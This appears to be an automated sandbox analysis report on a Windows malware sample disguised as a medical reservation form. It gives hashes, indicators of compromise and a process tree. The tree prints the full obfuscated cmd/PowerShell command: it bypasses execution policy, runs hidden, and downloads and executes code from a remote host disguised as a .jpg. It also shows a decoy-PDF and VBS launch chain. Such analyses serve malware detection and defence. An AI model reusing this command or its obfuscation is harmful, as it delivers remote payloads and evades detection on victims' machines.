b5e39716f576e5ff21e945560a98ee7ca7309491b2b7f2643728cd341b9c19de

Analysis

max time kernel
148s
max time network
154s
platform
windows7_x64
resource
win7
submitted
12-07-2020 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ficha OMS - Reserva Medicos.exe
Size

703KB
MD5

e6e25bc559a331c79f173920071e4f8e
SHA1

ca4681b1f0f8fe4c2f8d142a85b08e56307a8f65
SHA256

b5e39716f576e5ff21e945560a98ee7ca7309491b2b7f2643728cd341b9c19de
SHA512

b3cd1b2da11bb8a7432e1451d9ff23a08145d0ace05fd7e99da11eeb6dddfd8039aed2b5e6087dc8027c0a2b7705761fe32347b4a2126c1e4c06cfb346279150

Score

8^/10

Malware Config

Signatures

Blacklisted process makes network request 46 IoCs

flow	pid	Process
5	1836	powershell.exe
6	1836	powershell.exe
7	1836	powershell.exe
8	1836	powershell.exe
9	1836	powershell.exe
10	1836	powershell.exe
11	1836	powershell.exe
12	1836	powershell.exe
13	1836	powershell.exe
14	1836	powershell.exe
15	1836	powershell.exe
16	1836	powershell.exe
17	1836	powershell.exe
18	1836	powershell.exe
19	1836	powershell.exe
22	1836	powershell.exe
23	1836	powershell.exe
24	1836	powershell.exe
25	1836	powershell.exe
26	1836	powershell.exe
27	1836	powershell.exe
28	1836	powershell.exe
29	1836	powershell.exe
30	1836	powershell.exe
31	1836	powershell.exe
32	1836	powershell.exe
33	1836	powershell.exe
34	1836	powershell.exe
35	1836	powershell.exe
36	1836	powershell.exe
37	1836	powershell.exe
38	1836	powershell.exe
39	1836	powershell.exe
40	1836	powershell.exe
41	1836	powershell.exe
42	1836	powershell.exe
43	1836	powershell.exe
44	1836	powershell.exe
45	1836	powershell.exe
46	1836	powershell.exe
47	1836	powershell.exe
48	1836	powershell.exe
49	1836	powershell.exe
50	1836	powershell.exe
51	1836	powershell.exe
52	1836	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1544	AcroRd32.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 532	2040	Ficha OMS - Reserva Medicos.exe	24
PID 2040 wrote to memory of 532	2040	Ficha OMS - Reserva Medicos.exe	24
PID 2040 wrote to memory of 532	2040	Ficha OMS - Reserva Medicos.exe	24
PID 2040 wrote to memory of 532	2040	Ficha OMS - Reserva Medicos.exe	24
PID 532 wrote to memory of 1544	532	WScript.exe	25
PID 532 wrote to memory of 1544	532	WScript.exe	25
PID 532 wrote to memory of 1544	532	WScript.exe	25
PID 532 wrote to memory of 1544	532	WScript.exe	25
PID 532 wrote to memory of 1500	532	WScript.exe	26
PID 532 wrote to memory of 1500	532	WScript.exe	26
PID 532 wrote to memory of 1500	532	WScript.exe	26
PID 532 wrote to memory of 1500	532	WScript.exe	26
PID 1500 wrote to memory of 1180	1500	WScript.exe	27
PID 1500 wrote to memory of 1180	1500	WScript.exe	27
PID 1500 wrote to memory of 1180	1500	WScript.exe	27
PID 1500 wrote to memory of 1180	1500	WScript.exe	27
PID 1180 wrote to memory of 1836	1180	cmd.exe	29
PID 1180 wrote to memory of 1836	1180	cmd.exe	29
PID 1180 wrote to memory of 1836	1180	cmd.exe	29
PID 1180 wrote to memory of 1836	1180	cmd.exe	29

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

pid	Process
1180	cmd.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1544	AcroRd32.exe
1544	AcroRd32.exe
1544	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe
Token: 33	1836	powershell.exe
Token: SeIncBasePriorityPrivilege	1836	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1836	powershell.exe
1836	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Ficha OMS - Reserva Medicos.exe
"C:\Users\Admin\AppData\Local\Temp\Ficha OMS - Reserva Medicos.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:532
- - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file1.pdf"
    3⤵
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:1544
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file2.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C PoWErShElL -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('http://reservasbestco.com.br/final.jpg');$results
      4⤵
      Suspicious use of WriteProcessMemory
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:1180
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PoWErShElL -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('http://reservasbestco.com.br/final.jpg');$results
        5⤵
        Blacklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        Suspicious behavior: EnumeratesProcesses
        
        PID:1836

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/532-7-0x00000000026C0000-0x00000000026C4000-memory.dmp

Filesize
16KB

Download
memory/2040-0-0x0000000002430000-0x0000000002531000-memory.dmp

Filesize
1.0MB

Download